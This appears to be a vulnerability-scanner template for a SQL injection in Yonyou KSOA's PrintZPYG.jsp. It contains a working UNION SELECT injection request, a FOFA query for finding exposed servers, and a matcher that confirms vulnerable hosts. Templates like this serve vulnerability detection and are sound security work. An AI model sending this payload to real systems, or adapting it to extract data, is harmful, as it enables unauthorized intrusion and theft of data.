id: yonyou-ksoa-PrintZPYG-sqli
info:
  name: 用友时空 KSOA PrintZPYG.jsp - sqli
  author: leadlife
  severity: high
  description: 用友时空KSOA接口 /kp//PrintZPYG.jsp 接口存在SQL注入漏洞，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%E6%97%B6%E7%A9%BAKSOA%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3PrintZPYG.jsp%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: app="用友-时空KSOA"
  tags: 2024,yonyou,ksoa,sqli,oa

http:
  - raw:
      - |
        GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%20%271%27)),4,5,6,7,8,9,10,11,12,13,14+--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,'c4ca4238a0b923820dcc509a6f7')
        condition: and